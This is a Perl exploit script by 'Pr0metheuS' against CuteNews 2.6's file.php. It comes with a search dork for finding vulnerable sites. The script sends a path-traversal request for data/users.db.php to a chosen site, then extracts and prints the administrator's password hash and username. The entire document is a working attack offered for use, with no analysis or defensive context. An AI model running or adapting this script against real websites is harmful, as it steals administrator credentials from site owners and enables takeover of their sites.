!/usr/bin/perl #Found by Pr0metheuS #Coded by Pr0metheuS #CuteNews 2.6 ( module file.php ) #Gr33tz-TeaM #Dork : inurl:/cutenews/file.php use LWP::UserAgent; if(@ARGV!=2){ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "USAGE : perl $0 <SITE> <PATH>\n"; exit; } ($SITE,$PATH)=@ARGV; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php"); $req->header('Accept' => 'text/html'); $res = $ua->request($req); $con = $res->content; if($res->is_success){ if($con =~ /([0-9a-fA-F]{32})/){ $hash = $1; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Exploit Work!\n"; print "[+] Admin Pass : ".$hash."\n"; $ua2 = new LWP::UserAgent; $ua2->agent("Mozilla/8.0"); $ua2 = LWP::UserAgent->new; my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php"); $req2->header('Accept' => 'text/html'); $res2 = $ua2->request($req2); $con2 = $res2->content; if($con2 =~ /\|.\|(.*)\|$hash\|/){ $user = $1; print "[+] Admin Username : ".$user."\n"; } } else{ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Connect failed..\n"; } } else{ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n"; print "-=-=-= By Pr0metheuS -=-=-=-=-\n"; print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n"; print "-=-=-= Gr33tz To : -=-=-=-=-\n"; print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n"; print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; print "_____________________________\n"; print "[+] Exploit Failed..\n"; }